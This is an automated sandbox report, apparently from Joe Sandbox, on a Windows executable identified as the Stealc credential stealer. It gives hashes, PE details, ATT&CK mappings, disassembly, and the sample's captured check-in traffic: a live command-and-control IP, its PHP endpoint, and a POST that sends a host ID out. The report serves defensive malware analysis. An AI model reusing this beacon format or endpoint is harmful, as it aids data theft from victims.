              Source: Yara matchFile source: 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5436, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpjfile.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.phpffile.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1565520
                          Start date and time:2024-11-30 04:11:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 129
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                          • 185.215.113.16
                          newtpp.exeGet hashmaliciousXmrigBrowse
                          • 185.215.113.66
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.43
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946354570205017
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'840'128 bytes
                          MD5:bb0c42d0421512d8f7796f5253543456
                          SHA1:8b3139e22e253adc3b55d8743a7d4cc173aa567d
                          SHA256:29ca807f5372fed46f73a09b357be9a41c7271307d273a20fe9045eeadce65e8
                          SHA512:20b2775045ae808319bd5283e6812ee03a6b96faf7a110b0246e43d8de7132822dd8c0c1df8d0516b7350a0fc5f4b862af30807e3dbc875cfd2bbfefc622934e
                          SSDEEP:49152:iM4IR3PksYn/lXz5lEsNEJqgIY210WiJC:R3PVkA+qqyWi4
                          TLSH:CB8533B5DA752FBBDD45A4B7C75353065BE049438F7449203DE4FBCA082A28FF80A989
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........PE..L.....Hg...........

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xaaa000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x674897E8 [Thu Nov 28 16:18:48 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F2B9C7F079Ah
                          pslld mm3, qword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1f0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2490000x162009c0eb5c4def466a22b998b245364a33cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x24a0000x1f00x20032f8c5f2bf901a0cf6786f64ea7c8c97False0.6328125data4.887270092054358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x24c0000x2b50000x200ddc14a5871ca9e27bf49e0746777944bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          sqwnkuay0x5010000x1a80000x1a7400fdfa38a99028b61b3fd6a8a12ed4e865False0.9946332324276432data7.954864550900061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          dlrscmkp0x6a90000x10000x60073178c9decc2289475a36f1232ecbadeFalse0.60546875data5.2464103360119365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6aa0000x30000x2200e9f5a87af4a8057cbbf4dec71710c837False0.05905330882352941DOS executable (COM)0.7292797376181227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x6a81180x198ASCII text, with CRLF line terminators0.5833333333333334

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-11-30T04:12:02.565183+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 30, 2024 04:12:00.606647015 CET4970480192.168.2.5185.215.113.206
                          Nov 30, 2024 04:12:00.726916075 CET8049704185.215.113.206192.168.2.5
                          Nov 30, 2024 04:12:00.726995945 CET4970480192.168.2.5185.215.113.206
                          Nov 30, 2024 04:12:00.732795954 CET4970480192.168.2.5185.215.113.206
                          Nov 30, 2024 04:12:00.852802992 CET8049704185.215.113.206192.168.2.5
                          Nov 30, 2024 04:12:02.105911016 CET8049704185.215.113.206192.168.2.5
                          Nov 30, 2024 04:12:02.106126070 CET4970480192.168.2.5185.215.113.206
                          Nov 30, 2024 04:12:02.113874912 CET4970480192.168.2.5185.215.113.206
                          Nov 30, 2024 04:12:02.234029055 CET8049704185.215.113.206192.168.2.5
                          Nov 30, 2024 04:12:02.565124989 CET8049704185.215.113.206192.168.2.5
                          Nov 30, 2024 04:12:02.565182924 CET4970480192.168.2.5185.215.113.206
                          Nov 30, 2024 04:12:05.750816107 CET4970480192.168.2.5185.215.113.206

                          HTTP Request Dependency Graph

                          • 185.215.113.206

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704185.215.113.206805436C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Nov 30, 2024 04:12:00.732795954 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 30, 2024 04:12:02.105911016 CET203INHTTP/1.1 200 OK
                          Date: Sat, 30 Nov 2024 03:12:01 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 30, 2024 04:12:02.113874912 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 34 30 31 30 44 43 35 38 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a
                          Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"DA4010DC58231817704571------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"drum------IIJKJDAFHJDHIEBGCFID--
                          Nov 30, 2024 04:12:02.565124989 CET210INHTTP/1.1 200 OK
                          Date: Sat, 30 Nov 2024 03:12:02 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:22:11:58
                          Start date:29/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x120000
                          File size:1'840'128 bytes
                          MD5 hash:BB0C42D0421512D8F7796F5253543456
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:4.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:19%
                            Total number of Nodes:1407
                            Total number of Limit Nodes:28
                            execution_graph 29155 143590 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 29173 144690 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 29174 143e90 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 29156 14959d 11 API calls 3 library calls 29144 13ad02 120 API calls 29137 138755 49 API calls 29183 143300 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 29145 12dd07 573 API calls 29146 138755 48 API calls 29138 134c89 304 API calls 29184 12b309 98 API calls 29193 12f789 144 API calls 29133 12100d GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 29150 142d30 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 29185 142f30 11 API calls 29139 136cb9 138 API calls 29176 133ab9 244 API calls 29194 1313b9 408 API calls 29177 1216b9 200 API calls 29186 12bf39 177 API calls 29187 145045 7 API calls 29178 142ea0 GetUserDefaultLocaleName LocalAlloc CharToOemW 29164 142a23 lstrcpy 29165 13e229 147 API calls 29179 1476ae memset strlen ctype 29188 130329 126 API calls 29134 143450 7 API calls 29158 134dd7 296 API calls 29167 142a50 10 API calls 29168 143650 6 API calls 29140 138755 47 API calls 29180 13e2d9 140 API calls 29141 13f4d8 93 API calls 27696 141dc0 27748 122a90 27696->27748 27700 141dd3 27701 141df9 lstrcpy 27700->27701 27702 141e05 27700->27702 27701->27702 27703 141e35 ExitProcess 27702->27703 27704 141e3d GetSystemInfo 27702->27704 27705 141e55 27704->27705 27706 141e4d ExitProcess 27704->27706 27849 121030 GetCurrentProcess VirtualAllocExNuma 27705->27849 27711 141e72 27712 141e88 27711->27712 27714 141e80 ExitProcess 27711->27714 27861 142ca0 GetProcessHeap RtlAllocateHeap GetComputerNameA 27712->27861 27715 141eb7 lstrlen 27721 141ecf 27715->27721 27716 141e8d 27716->27715 28070 142c10 GetProcessHeap RtlAllocateHeap GetUserNameA 27716->28070 27718 141ea1 27718->27715 27723 141eb0 ExitProcess 27718->27723 27719 141ef3 lstrlen 27720 141f09 27719->27720 27724 141f2a 27720->27724 27725 141f16 lstrcpy lstrcat 27720->27725 27721->27719 27722 141ee3 lstrcpy lstrcat 27721->27722 27722->27719 27726 142ca0 3 API calls 27724->27726 27725->27724 27727 141f2f lstrlen 27726->27727 27729 141f44 27727->27729 27728 141f6a lstrlen 27730 141f80 27728->27730 27729->27728 27731 141f57 lstrcpy lstrcat 27729->27731 27732 141f9e 27730->27732 27733 141f8a lstrcpy lstrcat 27730->27733 27731->27728 27863 142c10 GetProcessHeap RtlAllocateHeap GetUserNameA 27732->27863 27733->27732 27735 141fa3 lstrlen 27736 141fb7 27735->27736 27737 141fc7 lstrcpy lstrcat 27736->27737 27738 141fda 27736->27738 27737->27738 27739 141ff8 lstrcpy 27738->27739 27740 142000 27738->27740 27739->27740 27741 142026 OpenEventA 27740->27741 27742 14205c CreateEventA 27741->27742 27743 142038 CloseHandle Sleep OpenEventA 27741->27743 27864 141cf0 GetSystemTime 27742->27864 27743->27742 27743->27743 27747 142075 CloseHandle ExitProcess 28071 124a60 27748->28071 27750 122aa1 27751 124a60 2 API calls 27750->27751 27752 122ab7 27751->27752 27753 124a60 2 API calls 27752->27753 27754 122acd 27753->27754 27755 124a60 2 API calls 27754->27755 27756 122ae3 27755->27756 27757 124a60 2 API calls 27756->27757 27758 122af9 27757->27758 27759 124a60 2 API calls 27758->27759 27760 122b0f 27759->27760 27761 124a60 2 API calls 27760->27761 27762 122b28 27761->27762 27763 124a60 2 API calls 27762->27763 27764 122b3e 27763->27764 27765 124a60 2 API calls 27764->27765 27766 122b54 27765->27766 27767 124a60 2 API calls 27766->27767 27768 122b6a 27767->27768 27769 124a60 2 API calls 27768->27769 27770 122b80 27769->27770 27771 124a60 2 API calls 27770->27771 27772 122b96 27771->27772 27773 124a60 2 API calls 27772->27773 27774 122baf 27773->27774 27775 124a60 2 API calls 27774->27775 27776 122bc5 27775->27776 27777 124a60 2 API calls 27776->27777 27778 122bdb 27777->27778 27779 124a60 2 API calls 27778->27779 27780 122bf1 27779->27780 27781 124a60 2 API calls 27780->27781 27782 122c07 27781->27782 27783 124a60 2 API calls 27782->27783 27784 122c1d 27783->27784 27785 124a60 2 API calls 27784->27785 27786 122c36 27785->27786 27787 124a60 2 API calls 27786->27787 27788 122c4c 27787->27788 27789 124a60 2 API calls 27788->27789 27790 122c62 27789->27790 27791 124a60 2 API calls 27790->27791 27792 122c78 27791->27792 27793 124a60 2 API calls 27792->27793 27794 122c8e 27793->27794 27795 124a60 2 API calls 27794->27795 27796 122ca4 27795->27796 27797 124a60 2 API calls 27796->27797 27798 122cbd 27797->27798 27799 124a60 2 API calls 27798->27799 27800 122cd3 27799->27800 27801 124a60 2 API calls 27800->27801 27802 122ce9 27801->27802 27803 124a60 2 API calls 27802->27803 27804 122cff 27803->27804 27805 124a60 2 API calls 27804->27805 27806 122d15 27805->27806 27807 124a60 2 API calls 27806->27807 27808 122d2b 27807->27808 27809 124a60 2 API calls 27808->27809 27810 122d44 27809->27810 27811 124a60 2 API calls 27810->27811 27812 122d5a 27811->27812 27813 124a60 2 API calls 27812->27813 27814 122d70 27813->27814 27815 124a60 2 API calls 27814->27815 27816 122d86 27815->27816 27817 124a60 2 API calls 27816->27817 27818 122d9c 27817->27818 27819 124a60 2 API calls 27818->27819 27820 122db2 27819->27820 27821 124a60 2 API calls 27820->27821 27822 122dcb 27821->27822 27823 124a60 2 API calls 27822->27823 27824 122de1 27823->27824 27825 124a60 2 API calls 27824->27825 27826 122df7 27825->27826 27827 124a60 2 API calls 27826->27827 27828 122e0d 27827->27828 27829 124a60 2 API calls 27828->27829 27830 122e23 27829->27830 27831 124a60 2 API calls 27830->27831 27832 122e39 27831->27832 27833 124a60 2 API calls 27832->27833 27834 122e52 27833->27834 27835 1465a0 GetPEB 27834->27835 27836 1467d3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 27835->27836 27837 1465d3 27835->27837 27838 146835 GetProcAddress 27836->27838 27839 146848 27836->27839 27846 1465e7 20 API calls 27837->27846 27838->27839 27840 146851 GetProcAddress GetProcAddress 27839->27840 27841 14687c 27839->27841 27840->27841 27842 146885 GetProcAddress 27841->27842 27843 146898 27841->27843 27842->27843 27844 1468b4 27843->27844 27845 1468a1 GetProcAddress 27843->27845 27847 1468e7 27844->27847 27848 1468bd GetProcAddress GetProcAddress 27844->27848 27845->27844 27846->27836 27847->27700 27848->27847 27850 121057 ExitProcess 27849->27850 27851 12105e VirtualAlloc 27849->27851 27852 12107d 27851->27852 27853 1210b1 27852->27853 27854 12108a VirtualFree 27852->27854 27855 1210c0 27853->27855 27854->27853 27856 1210d0 GlobalMemoryStatusEx 27855->27856 27858 121112 ExitProcess 27856->27858 27859 1210f5 27856->27859 27859->27858 27860 12111a GetUserDefaultLangID 27859->27860 27860->27711 27860->27712 27862 142cf4 27861->27862 27862->27716 27863->27735 28076 1419f0 27864->28076 27866 141d51 sscanf 28115 122a20 27866->28115 27869 141da6 27870 141db9 27869->27870 27871 141db2 ExitProcess 27869->27871 27872 1401a0 27870->27872 27873 1401b0 27872->27873 27874 1401dd lstrcpy 27873->27874 27875 1401e9 lstrlen 27873->27875 27874->27875 27876 1402a0 27875->27876 27877 1402b7 lstrlen 27876->27877 27878 1402ab lstrcpy 27876->27878 27879 1402cf 27877->27879 27878->27877 27880 1402e6 lstrlen 27879->27880 27881 1402da lstrcpy 27879->27881 27882 1402fe 27880->27882 27881->27880 27883 140315 27882->27883 27884 140309 lstrcpy 27882->27884 28117 141740 27883->28117 27884->27883 27887 